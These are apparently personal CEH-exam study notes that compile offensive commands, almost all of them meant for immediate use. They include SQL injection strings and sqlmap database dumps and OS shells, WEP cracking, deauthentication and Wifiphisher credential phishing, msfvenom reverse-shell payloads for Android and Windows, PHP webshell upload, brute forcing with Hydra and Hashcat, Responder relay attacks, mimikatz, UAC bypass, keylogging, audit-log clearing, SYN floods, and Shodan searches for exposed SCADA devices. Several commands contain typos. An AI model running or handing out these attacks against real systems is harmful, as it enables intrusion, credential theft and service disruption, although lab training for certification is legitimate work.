open login form

username> blah'; INSERT into login values values('john','apple123'); --

password> empty

a new user account created

open login form

username> blah'; create database mydatabase; --

password> empty

a new db created

open login form

username> blah'; drop database mydatabase; --

password> empty

database db deleted

open login form

username> blah'; exec master..xp_cmdshell 'ping $ip'; --

password> empty

start pinging to specifed ip

______________________________________________________________________________________________________

Perform SQLi again MSSQL to extract db's using sqlmap

open website of choice

developer tools > console >

documnet.cookie

output: cookie displayed

Enumerate databases

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --dbs

-u target url

--cookie cookie header value

--dbs enumerate dbs

include all tests > yes

all enumerated dbs would be listed

Enumerate tables from moviescope db

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D moviescope --tables

all tables would be listed

dump user_login table from movie scope

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D moviescope -T user_login --dump

Acquire shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --os-shell

output: os-shell>hostname

reterive standard outpt: Y

______________________________________________________________________________________________________

Detect sqli using DSSS

git clone https://github.com/stamparm/DSSS

python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0"

output: vulenrable url would be displayed

______________________________________________________________________________________________________

Detect sqli using ZAP

ENTER URL > SCAN

CHECK IF SQL VULERNABILITY EXIST

Hacking Wireless Networks

WLAN 1EEE 802.11

SSID Service set identifier - wlan name

encyrption > wep (exploitable vulnerabilities), wpa, wpa2

_______________________________________________________________________________

Find wifi networks in range using net surveyour

list AP's, with SSIS, BSSID ,Strength

also output report

_______________________________________________________________________________

Find wifi networks and sniff packets using wash and wireshark

airmon-ng check kill

to kill interferring processess

airmon-ng start wlan0

promiscous mode & name changed to wlan0mon

wash -i wlan0mon

show wps enabled devices

open wireshark

interface > wlan0mon > pkts will be displayed and captured

_______________________________________________________________________________

Perform wireless attacks

***Find hidden SSID's using Aircrack-ng

airmon-ng check kill

to kill interferring processess

airmon-ng start wlan0

promiscous mode & name changed to wlan0mon

airodump-ng wlan0mon

hops from channel to channel and show all AP's

airodump-ng wlan0mon --bssid B4:75:0E:89:00:60

capture IV from target AP

list clients connected to target

send de-auth pakts to client 1

aireplay-ny --deauth 15 -a B4:75:0E:89:00:60 -c 20:A6:0C:30:23:D3 wlan0mon

--deauth activates deauthentication

15 pkts to be sent

-a access point mac

-c dest. mac addr

wlan0mon wireless interface

get error ? re issue commands

our source mac is not associated with ap's mac the pkts

usually get ignored and deauth pkts would be replied which contains SSID of AP.

_______________________________________________________________________________

Crack WEP using Wifiphisher

apt-get install libnl-3-dev libnl-genl-3-dev

apt-get install libssl-dev

git clone https://github.com/wifiphisher/roguehostapd

cd rouguehostapd

python setup.py install

git clone https://github.com/wifiphisher/wifiphisher

cd wifiphisher

python3 setup.py install

wifiphisher --force-hostapd

output: starting wifiphisher

display all AP's

select CEH-LABS as AP to phish

choose phish method > network manager connect

a fake open wifi network would be created with same name CEH-LABS

CONNECT with it from your phone

notfifiication will be recevied to update android

prompt will appear for user to enter password

this is the password for orginal CEH-LABS

_______________________________________________________________________________

CRACK wep NETWORK USING Aircrack-ng

airmon-ng check kill

to kill interferring processess

airmon-ng start wlan0

promiscous mode & name changed to wlan0mon

airodump-ng wlan0mon

hops from channel to channel and show all AP's

airodump-ng wlan0mon --encrypt wep

show only AP's with wep encryption enabled

before proceeding, check if injection attack is possible

aireplay-ng -9 -e CEH-LABS -a B4:75:0E:89:00:60 wlan0mon

-9 TESTS injection

-a access point mac

-e Target-IP SSID

wlan0mon wireless interface

IF OUTOUT : injection is working

airodump-ng wlan0mon --bssid B4:75:0E:89:00:60 -c 1 -w WEPcrack

-c channel on which target ap is running

wepcrack filename to store captured IV's

in parallel: aireplay-ny -3 -h 20:A6:0C:30:23:D3 -b B4:75:0E:89:00:60 wlan0mon

GENERATE ARP POSIONING IN NETWORK

ap's will rebroadcast arp packets and new iv's would be generated

wait untill 20,000 arp pkts captured in netwok

press control c to stop pkt capture of airodump

aircrack-ng WEPcrack-01.cap

decrypt and provide key

_______________________________________________________________________________

Crack WPA network using Fern Wifi cracker

select interface > wlan0 > monitor mode enabled

scan for AP's

select any AP from list

browse wordlist

open

brute force

Hacking Mobile Applications

Hack andoird by binary payload

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > backdoor.apk

use exploit/multi/handler

exploit -j -z

execute app on other side

meterpreter

________________________________________________________________________________________

Harvest creds using SET

run SET

1-social eng attacks > 3-cred harvestor attack

2 site cloner > send clone site link and get creds

________________________________________________________________________________________

launch DOS on target using LOIC from android

run apk > enter ip>start

________________________________________________________________________________________

Exploit android platform through ADB using phonesploit

apt-get install adb

git clone https://github.com/01010000-kumar/PhoneSploit

cd PhoneSploit

python3 -m pip install colorama

python3 phonesploit.py

enter3 : connect a new phone

enter ip

connected

enter 4 : get shell on phone

$pwd

________________________________________________________________________________________

Secure andoroid using various android security tools

method 1:

sixo online apk analyzer

drop apk here and analyze

method 2:

AVC UnDroid

select APK and analyze

method 3:

using quixxi vuln scanner

upload apk and check if CVE exist

________________________________________________________________________________________

Secure Android devices from Malicious Apps using malwarebyets security

install in phone and scan

IOT and OT Hacking

protocols : mqtt modbus zigbee ble 5g

use ghdb on exploit db

search > scada > find systems for default passwords

using shodan

port 1833 default mqtt over tcp port

search > port:1833

modbus enabled devices

search > port:502

search using PLC Name

search > "schneider electric"

using geo location

SCADA Country:"US"

______________________________________________

CAPTURE IOT Device traffic

ubuntu machine

sudo snap install mqtt-explorer

mqtt-explorer

gui will open

host,name> mqtt.eclipse.org

protocol>mqtt

port >1883

validate cert>on

connect

device would connect and show all its details

wireshark will also capture all connection traffic against mqtt protocol

Topics:

Reconnaissance

Scanning

Enumeration

Packet sniffing

Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc.

System hacking, steganography

Network scanning to identify live and vulnerable machines in a network.

OS banner grabbing, service, and user enumeration.

Different types of cryptography attacks.

Web application attacks

SQL injection attacks.

Tools:

Scanning
- nmap (strongly!)
- Zenmap
Sniffing
- Wireshark (strongly!)
Rainbow tables
- RainbowCrack
SQL Injection tools
- sqlmap
Password brute-forcing tools
- Hydra
- John The Ripper
WordPress Hacking
- wpscan
Criptography
- hashcalc
- Veracrypt
Steganography
- Quick Stego

1) Nmap

2) Snow — Stegnography

3) Open Stego

3) Wpscan

4) WireShark

5) SqlMap

6) OWASP ZAP

7) Hashcat

8) John

9) Hydra

10) Veracrypt

11) Crypttool

12) Hash Calculator

13) MD5 Calculator

14) PhoneSploit

15) MetaSploit

16) BCTextEncoder

Windows:

Windows

There were more windows based questions so you have to practice on windows GUI tools like mentioned below.

1) “Open Stego” for Stegnography

https://www.openstego.com/

2) “WireShark” for Pcap analysis

https://www.wireshark.org/download.html

3) “ZAP” for SQLInjecion exploit

https://www.zaproxy.org/download/

4) “Veracrypt” for Disk Decryption

https://www.veracrypt.fr/en/Downloads.html

5) “Hash calculator” to find the hash of the file

https://www.slavasoft.com/hashcalc/

6) “MD5 Calculator” to compare the hashes

http://www.md5calculator.com/

7) “Cryptool” and “BCTextEncoder” to Crack the encoded files

https://www.jetico.com/free-security-tools/encrypt-text-bctextencoder

Windows based Commands which will help you to find the answers.

1) net user — For Domain Users Enumeration

2) snow.exe -C -p “password” stegfile.txt

3) type C:\path.txt — It displays the content of the path.txt file.

4) dir

5) cd

6) hostname

7) whoami

8) PWd

Linux based tools

1) Nmap

2) wpscan

3) sqlmap

4) hashcat

5) john

6) Hydra

7) PhoneSploit

8) Metasploit

Commands were used during the exam

-------------Tools, Commands and Techniques for CEH Master---------------

Nmap

nmap -sn 170.16.0.1/24 -oN nmap.txt

nmap -O 170.16.0.1/24 -oN namp-OS.txt

namp -sC -sV -sS 170.16.0.20 -oN namp-all.txt

nmap -sn 10.10.10.10/24 -oN nmap.txt

nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt

nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24

nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt

nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x

nmap -sC -sV -v -oN nmap.txt 10.10.10.10

nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1

nmap -f IP

nmap -sn -PR IP

nmap -sn -PE ip-range

nmap -sn 10.10.10.10/24

nmap -sC -sS -sV -O IP

nmap -A IP

-sn disable port scan

-PR ARP ping scan

-PU UDP ping scan

-PE ICMP ECHO ping scan

-f Splits IP into fragment packets

nmap --script smb-os-discovery.nse IP

Displays OS, Computer-Name, Domain, WorkGroup and Ports.

------------------------

Nmap -Pn -p 21 target > ftp

grep -B 5 open ftp

--------------------------

Nmap -Pn -p 3389 target > rdp

grep -B 5 open rdp

-------------------------

Nmap -Pn -p 3306 target > mysql

grep -B 5 open mysql

2) wpscan

wpscan -u james -P /password.txt — url

wpscan --url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt

wpscan --url https://example/ --enumerate u (To enumerate the user)

WPSCAN

User Enumeration : wpscan --url https://example/ --enumerate u

Bruteforce: wpscan --url https://example/ --passwords wordlist.txt --usernames samson

wpscan --url http://10.10.10.12:8080/CEG --enumerate u

msfconsole

use axiliary/scanner/http/wordpress_login_enum

PASS_FILE /root/Desktop/wordlists/Passwords.txt

set RHOSTs 10.10.10.12

set RPORT 8080

set TARGETURI http://10.10.10.12:8080/CEH/

set USERNAME admin

run

3) sqlmap

I didn’t used “sqlmap” for any sqlinjection related question, incase if you get any questions related to sqlinjection use github repo you will find some usefull commands.

OWASP ZAP

Open the ZAP

Add the webiste name to Autoscan

Click on the Alert tab to know about Vulnerabilities

---------------------------------------------------------------------------------------------------------------------------------------------------------

SQL MAP

Open the vulnerable website

Copy the cookie from the inspect element

Open the terminal to use sqlmap

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

You will get all the Useraname and Passwords of the website.

------------------------------------------------------------------------------------------------------------------------------------------------------

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell

It opens up the Interactive OS shell.

-------------------------------------------------------------------------------------------------------------------------------------------------------

mysql -U qdpmadmin -h 192.168.1.8 -P passwod

show databases;

use qdpm;

show tables'

select * from users;

show dtabases;

use staff;

show tables;

select * from login;

select * from user;

When you have username and Password for the database.

----------------------------------------------------------------------------------------------------------

URL = http://testphp.vulnweb.com/artists.php?artist=1

Find DBs = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

Result is DB name acuart

Find Tables = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch

Result is table name users

Find columns = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

Dump table = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

Dump the DB = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch

Reference = https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

Using cookies

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx' --random-agent --level=1 --risk=3 --dbs --batch

SQL Injection

in login page enter blah' or 1=1-- as username and click login without entering the password

OS Shell = sqlmap -u 'url' --dbms=mysql --os-shell

SQL Shell = sqlmap -u 'url' --dbms=mysql --sql-shell

4) Hashcat and john

If you get questions related to Hash caracking use this github repo you will find some usefull commands.

Hash identifier and Hash cracking

Hash Identifier

https://www.onlinehashcrack.com/hash-identification.php

Hash-identifier (CLI)

Hash Crack

https://crackstation.net/

https://hashes.com/en/decrypt/hash

Hashcat -a 3 -m 900 hash.txt /rockyou.txt

-a attack mode

-m hashtype

900 md4

1000 NTLM

1800 SHA512CRYPT

110 SHA1 with SALT HASH

0 MD5

100 SHA1

1400 SHA256

3200 BCRYPT

160 HMAC-SHA1

Dictionary Attack

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

-m 0 designates the type of hash we are cracking (MD5);

-a 0 designates a dictionary attack;

-o cracked.txt is the output file for the cracked passwords;

-target_hashes.txt is our input file of hashes;

-/usr/share/wordlists/rockyou.txt = Path to the wordlist

m - 0:MD5

100:SHA1

1400:SHA256

1700:SHA512

900:MD4

3200:BCRYPT

Also Important to check hash

#hash-identifier

#hash -m [file]

- Steps-

1. First identify hash - use `hash-identifier` OR `john filename` OR `cyberchef` OR any other online tool

2. Crack - `hashcat -m 1800 test.hash -o crack.txt /usr/share/wordlists/rockyou.txt`, -m (Hash mode, give number of the hash type identified above) OR `hashcat -m 1800 hash...... /usr/share/wordlists/rockyou.txt`

John

1. First analyze hash type - `john hashfile.hash`

2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`

3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash

Single crack mode: john --single --format=raw-sha1 crack.txt

Crack the password in file using wordlist: john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt (Crack.txt here contains the hashes)

Cracking service credentials like ss

1. First have to convert the hash file to JOHN format : ssh2john /home/text/.ssh/id_rsa > crack.txt (Now we need to crack this crack.txt file with John The Ripper)

2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

To crack ZIP

1. zip2john file.zip > crack.txt

2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Notes:

–wordlist can be written as -w also

john crack.txt --wordlist=rockyou.txt --format=Raw-SHA256

5) Netuser

Snow.exe -C -p “given_password” file_name

6) Hydra

hydra -L /user.txt -P /password.txt ftp://172.0.16.21

Hydra

- **FTP**: hydra -l user -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)

hydra -L userlist.txt -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)

- SSH: hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh

- Post Web Form: hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

- `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`

- `hydra -l root -P passwords.txt [-t 32] <IP> ftp

- `hydra -L usernames.txt -P pass.txt <IP> mysql

- `hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`

- `hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>`

- `hydra -P common-snmp-community-strings.txt target.com snmp

- `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1

- `hydra -l root -P passwords.txt <IP> ssh

FOR FTP

If username is already given = hydra -l samson -P -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

If password is given and needs to find username = hydra -L user.txt -p 123 192.168.1.101 ftp

If both username and password is not given = hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

Reference = https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/

FOR SSH

hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 -t 4 ssh

FOR HTTP FORM

hydra -L [user] -P [password] [IP] http-post-form "/:usernam=^USER^ & password=^PASS^:F=incorrect" -V

Hydra -l james -P given_wordlist ftp://target

7) Phonesploit

To exploit the Android device and get the reverse shell, these commands will help you and the phonesploit will be installed in the root folder, if you don't find the phonesploit use the command like “find phonesploit”.

PhoneSploit

https://n00bie.medium.com/hacking-android-using-phonesploit-ffbb2a899e6

apt-get install adb

git clone github.com/01010000/phonesploit

cd phonesploit

pyhton3 phonesploit.py

3 (Connect to new phone)

Add IP address of android device

4 (Access shell on phone)

IP address again of android device

pwd

cd sdcard

cd downloads

cat accnt-info.txt

https://github.com/cmuppin/CEH/blob/main/Android

8) Metasploit

If you get any questions related to netbios, SMB use metasploit.

9) Enumeration

SNMP Enumeration

nmap -sU -P 161 IP

snmp-check IP

Displays Network Info, Network Interfaces, Network IP, Routing Info, TCP connection and listening, process, Storage info, File System and Device Info.

NetBios Enumeration

nbstat -a IP

-a netbios name table

-c list contents of Netbios name cache

net use

Displays connection status, Shared folder/drive and Network Information.

10) Steganography

snow.exe -C -p "test" confidential.txt

-C compressing / uncompressing

-p password

Open Stego

GUI tool

11) Wireshark DDOS and Passwords

https://www.comparitech.com/net-admin/wireshark-cheat-sheet/

https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack

To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0

To find passwords : http.request.method == POST

To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0

To find passwords : http.request.method == POST

More reference: https://www.comparitech.com/net-admin/wireshark-cheat-sheet/

To find DOS: Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port(As per question)

12) Easy - Command Injection

Execute 127.0.0.1 & & net user

Execute 127.0.0.1 & & net user & & ver command

Execute 127.0.0.1 & & net user & & getmac

13) Medium - Command Injection

127.0.0.1&net user

127.0.0.1&net user&sc query&systeminfo

127.0.0.1&;&ipconfig

14) High - Command Injection

127.0.0.1|net user

15) FILE UPLOAD – WINDOWS

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

type GIF98 before PHP code and save as shell.jpeg.

Copy the uploaded path

Click on command injection and type below command

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg

C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

Msfconsole

Use multi/handler

Set payload php/meterpreter/reverse_tcp

Set lhost

Set lport

Run

16) Steghide

- This tool can only extract data from jpg/jpeg images.

- `steghide extract -sf <media filename>`

- `stegcracker <file> [<wordlist>]` → for brute forcing the password of password protect files

Gem:

17) Banner-grabbing

Whatweb

cURL

Wget

Telnet

Netcat

Nikto

Nmap

Dmitry

18) Directory Busting

Dirb

- `dirb <URL>`(using default word list - /usr/share/dirb/wordlists/common.txt), `dirb http://webscantest.com`

- `dirb <URL> <wordlist_location>`

- `dirb http://10.10.230.124/ -X .php,.html` **→ Enumerating Directory with Specific Extension List**

- `dirb http://10.10.230.124/ -o output.txt` → **Save Output to Disk**

DirBuster

- It is a Graphical (GUI) Tool.

Gobuster

-Commands

- `gobuster dir -u http://10.10.230.124/ -w /usr/share/wordlists/dirb/common.txt 2>/dev/null`

- `gobuster dir -u http://10.10.230.124/ -x txt,html -w /usr/share/wordlists/dirb/common.txt 2>/dev/null` **→ Enumerating Directory with Specific Extension List**

- `gobuster dir -u http://10.10.230.124/dvwa -w /usr/share/wordlists/dirb/common.txt -o output.txt 2>/dev/null` → **Save Output to Disk**

18) CEWL

- `cewl example.com -m 5 -w words.txt`

- where cewl is the tool, [example.com](http://example.com/) is the site, -m is to specify the minimum length of the word , -w is to specify the output file*

Exam Cheats sheets (1):

NMAP

1. Scan all ports

- nmap -p- 10.10.10.10

2. Scan all opened ports with more details

- nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10

- https://www.stationx.net/nmap-cheat-sheet/

CEWL

1. Cewl function

--> Generate wordlist from a website wording

2. How to use Cewl?

--> cewl -m 4 -w wordlist.txt http://10.10.10.10

--> cewl.exe example.com -m 5 -w words.txt

-m = Minimum character that will be put inside the wordlist result

FUZZING

1. Fuzzing

--> gobuster -e -u http://10.10.10.10 -w /usr/share/wordlists/medium.txt

--> dirb http://10.10.10.10 /usr/share/wordlists/medium.txt

HASHCAT

1. Hashcat

--> Crack hash value to plaintext

2. Crack NTLMv2

--> hashcat -m 5600 ntlmhash.txt rockyou.txt --force

--> hashcat.exe -m hash.txt rokyou.txt -O

--force = Running utilizing CPU processing

-O = Process more faster

--> Using "--force" will facing some problems when running the command

--> Download hashcat binaries at official website of hashcat

Hydra

1. Brute Force using Hydra

--> hydra -l root -P passwords.txt [-t 32] <IP> ftp

--> hydra -L usernames.txt -P pass.txt <IP> mysql

--> hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

--> hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

--> hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

--> hydra -P common-snmp-community-strings.txt target.com snmp

--> hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

--> hydra -l root -P passwords.txt <IP> ssh

2. Description

-l Single Username

-L Username list

-p Password

-P Password list

-t Limit concurrent connections

-V Verbose output

-f Stop on correct login

-s Port

3. Reference

--> https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/

--> https://tryhackme.com/room/hydra

hydra -l root -P passwords.txt [-t 32] <IP> ftp

hydra -L usernames.txt -P pass.txt <IP> mysql

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

hydra -P common-snmp-community-strings.txt target.com snmp

hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

hydra -l root -P passwords.txt <IP> ssh

Johntheripper

1. MD5

--> john --format=raw-md5 password.txt

Reference

--> https://medium.com/@sc015020/how-to-crack-passwords-with-john-the-ripper-fdb98449ff1

Netdiscover

1. Discover hosts

--> netdiscover -i eth0

--> netdiscover -r 192.168.1.0/24

--> netdiscover -i eth0 -P -r 192.168.1.0/24

-i : Interface de Rede (eth0)

-P : Print (Mostra o Resultado)

-r : Range (192.168.1.0/24)

2. Reference

--> https://kalilinuxtutorials.com/netdiscover-scan-live-hosts-network/

--> https://www.100security.com.br/netdiscover

Responder

1. Download Responder tool

--> git clone https://github.com/lgandx/Responder

2. Launch Responder

--> python Responder.py -I eth0

--> Check LLMNR / NBT-NS / DNS/MDNS are ON

3. Search shared file on victim host

--> \\hackme

4. Attacker host (Responder)

--> Received NTLMv2 Hash of the victim

5. Crack Hash value to get the password using Hashcat

--> hashcat -m 5600 hashes.txt rockyou.txt -D1

--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user

6. SMB Relay

--> python Multirelay.py -h

--> python Multirelay.py -t <Target-IP> -u ALL

--> Before running Multirelay script, need to turn OFF (SMB and HTTP) options

--> vim Responder.conf

--> Received hash value of the victim

--> Forward to the targeted file, to get access as the victim

7. Show password in victim host

--> help

--> mimi coffee

--> mimi sekurlsa::logonpasswords

8. RunFinger

--> Only work when SMB is disabled.

--> python RunFinger.py -h

--> python RunFinger.py -i 192.168.1.0/24

Reference

--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/

--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan

--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand

Searchsploit

1. Update Searchsploit

--> searchsploit -u

2. Search vulnerabilities

--> searchsploit linux kernal

--> searchsploit -t windows 10 (Focus on the Exploit Title)

3. Copy exploit

--> cp /usr/share/exploitdb/exploits/multiple/remote/8648.py /root/Desktop (Sample)

4. Complete sample

--> searchsploit “Linux Kernel”

--> searchsploit -m 7618 — Paste the exploit in the current directory

--> searchsploit -p 7618[.c] — Show complete path

--> searchsploit — nmap file.xml — Search vulns inside a Nmap XML result

4. Reference

--> https://www.youtube.com/watch?v=29GlfaH5qCM&ab_channel=HackerSploit

SQLmap

Let’s take an example

--> http://testphp.vulnweb.com/artists.php?artist=1

1. Database command

--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL

–dbs: fetch database name

–batch: This will leave sqlmap to go with default behavior whenever user’s input would be required

2. Table command

--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch

-D: DBMS database to enumerate (fetched database name)

–tables: enumerate DBMS database table

3. Collumn command

--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (fetched table name)

–columns: enumerate DBMS database columns

4. Retrieve all the data

--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

–dump: dump all information of DBMS database

5. Reference

--> https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

TCPdump

1. Reference

--> https://hackertarget.com/tcpdump-examples/

--> https://danielmiessler.com/study/tcpdump/

Wireshark

Reference

--> https://ismailtasdelen.medium.com/wireshark-cheat-sheet-43ebca1fbfa7

Wpscan

1. Brute force username/password login

--> wpscan --url http://10.10.10.10/ -U 'admin' -P /usr/share/wordlists/medium.txt

2. Normal scanning

--> wpscan --url <URL>

3. Enumerate User

--> wpscan --url https://10.10.10.10/ --enumerate u

4. Wordpress enumerate user using metasploit

--> use auxiliary/scanner/http/wordpress_login_enum

--> FILE_PASS

--> RHOST (Target)

--> RPORT

--> TARGETURI (URL) - [http://[IP Address of Windows Server 2016]:8080/CEH]

--> Username

5. Reference

-->

Exam Cheats sheets (2):

FOOTPRINTING AND RECONASIANCE

FIREBUG ADD-ON

ENUMERATION

GLOBAL NETWORK INVENTORY

ADVANCED IP SCANNER

-----------------------------

NETBIOS ENUMERATION

SUPERSCAN

NETBIOS ENUMERATOR

NULL SESSION NETBIOS

NET USE \\IP\FOLDER ""\USER:""

------------------------------

SNMP 161 BRUTE FORCE

NMAP -sU -p 161 --script=snmp-brute IP

METASPLOIT ( AUXILIARY/SCANNER/SNMP/SNMP_LOGIN) ( AUXILIARY/SCANNER/SNMP/SNMP_ENUM)

----------------------------------------------------------------------------------------

LDAP ENUMERATION

ACTIVE DIRECTORY EXPLORER

-----------------------------------

SAMBA ENUMERATION

ENUM4LINUX

VULNERABILITY ANALYSIS

NESSUS

NIKTO

SYSTEM HACKING

-------------------------------------

DUMPING AND CRACKING SAM HASHES

PWDUMP7

OPCRACK PARA CRACKING HASHES

-------------------------------------

CREATING RAINBOW TABLES

WINRTGEN (PARA CREAR TABLAS)

RAINBOWCRACK (PARA ROMPER LOS HASHES CON LA TABLA QUE CREAMOS ARRIBA)

-----------------------------------------------------------------------

AUDITING SYSTEM

LOPHTCRACK

CREATE A VIRUS WITH MSFVENOM (msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe (optional -e x86/shikata_ga_nai -b "\x00") LHOST=IP LPORT=PORT -o RUTA)

Iniciar msfconsole, use multi/handler , set payload windows/meterpreter/reverse_tcp

METERPRETER RUN VNC PARA VER EL DESKTOP DEL EQUIPO REMOTO

-----------------------------------------------------------------------

ESCALATE PRIVILEGE WITH METASPLOIT

run post/windows/gather/smart_hashdump

use exploit/windows/local/bypassuac_fodhelper // set SESSION 1 // set payload windows/meterpreter/reverse_tcp

getsystem (para obtener high priv)

--------------------------------------------------------------------------

download bootmgr (descarga archivos)

keyscan_start (Keylogger)

SPYTECH SPYAEGENT / Power SPY

--------------------------------------------------------------------------

HIDING FILES USING NTFS STREAMS

type c:\file > c:\secretfile:file

mklink backdoor.exe secretfile:file

-------------------------------------------------------------------------

HIDING FILES USING WHITE SPACE STEG

SNOW (snow -C -m "blabla" -p "magic" secretfile secretfile2 // snow -C -p "magic" secretfile2)

-------------------------------------------------------------------------

IMAGE STEGANOGRAPHY

OPENSTEGO // QuickStego

-------------------------------------------------------------------------

CLEARING AUDIT LOGS

auditpol /get /category:* (ver las audit policies)

auditpol /set /category:"system","account logon" /success:enable /failure:enable (habilitar audit policies)

auditpol /clear /y (clear all audit policies)

-------------------------------------------------------------------------

COVERT_TCP ( cc -o covert_tcp covert_tcp.c) (./covert_tcp -dest IPdest -source IPsrc -source_port 00 -dest_port 11 -server -file /secretfile

-------------------------------------------------------------------------

THEFATRAT

opcion 06 // opcion 03 // payload // opcion 07 // opcion 02 // BadDoc // y

-------------------------------------------------------------------------

LLMNR & NETBIOS

RESPONDER

responder -I tun0 // john responder_file

DENIAL OF SERVICE

--------------------------------------------------------------------------

SYN FLOODING METASPLOIT (auxiliary/dos/tcp/synflood timeout 20k)

HPING3 (hping3 -S IPvic -a IPatt -p 22 --flood)

HOIC

---------------------------------------------------------------------------

SESSION HIJACKING

ZAP Proxy (Add Break Tab // )

HACKING WEB SERVERS

FOOTPRINTING:

SKIPFISH like gobuster

httprecon tool

ID SERVE

UNISCAN -h URL -qweds

---------------------------------------------------------------------------

BRUTEFORCE

HYDRA

JOHN

HASHCAT

HACKING WEB APPLICATIONS

PARAMETER TAMPERING

XSS (<script>alert("HELLO")</script>)

----------------------------------------------------------------------------

ENUMERATION

WPSCAN (--url URL --enumerate u)

METASPLOIT (auxiliary/scanner/http/wordpress_login_enum)

COMMAND INJECTION ( |hostname, |net user TEST /add)

VEGA

ACUNETIX web scanner

----------------------------------------------------------------------------

FILE UPLOAD VULNERABILITY

msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=PORT -f raw

GUARDAR COMO PHP FILE

USAR BURP SUITE PARA MODIFICAR ON THE FLY LA EXTENSION DEL ARCHIVO

-----------------------------------------------------------------------------

CSRF

ABRIR WP /PLUGINS/INSTALLED PLUGINS/FIREWALL2

WPSCAN ENUMERATE VP

